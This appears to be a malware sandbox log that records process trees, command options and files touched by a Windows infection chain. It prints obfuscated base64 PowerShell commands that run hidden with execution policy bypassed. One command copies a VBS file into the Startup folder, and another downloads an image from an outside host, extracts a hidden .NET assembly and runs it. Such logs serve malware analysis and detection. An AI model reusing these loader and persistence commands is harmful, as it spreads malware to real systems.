⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂D⁂⁂LwBR⁂HM⁂Rg⁂1⁂Hg⁂LwBk⁂C8⁂ZQBl⁂C4⁂ZQB0⁂HM⁂YQBw⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"
parent_process wscript.exe martian_process cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\IE_NET.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ UHB.vbs')"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂HM⁂ZQBy⁂HY⁂ZQBy⁂GY⁂d⁂Bw⁂C4⁂bwBu⁂Gw⁂aQBu⁂GU⁂LwBp⁂G0⁂ZwBz⁂C8⁂YgBh⁂HQ⁂XwBu⁂GE⁂d⁂Bp⁂HY⁂ZQ⁂u⁂Go⁂c⁂Bl⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂D⁂⁂LwBR⁂HM⁂Rg⁂1⁂Hg⁂LwBk⁂C8⁂ZQBl⁂C4⁂ZQB0⁂HM⁂YQBw⁂C8⁂Lw⁂6⁂HM⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂CQ⁂YQBy⁂Gc⁂dQBt⁂GU⁂bgB0⁂HM⁂KQ⁂=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'http://serverftp.online/imgs/bat_native.jpeg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('0/QsF5x/d/ee.etsap//:sptth');$method.Invoke($null, $arguments)"
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe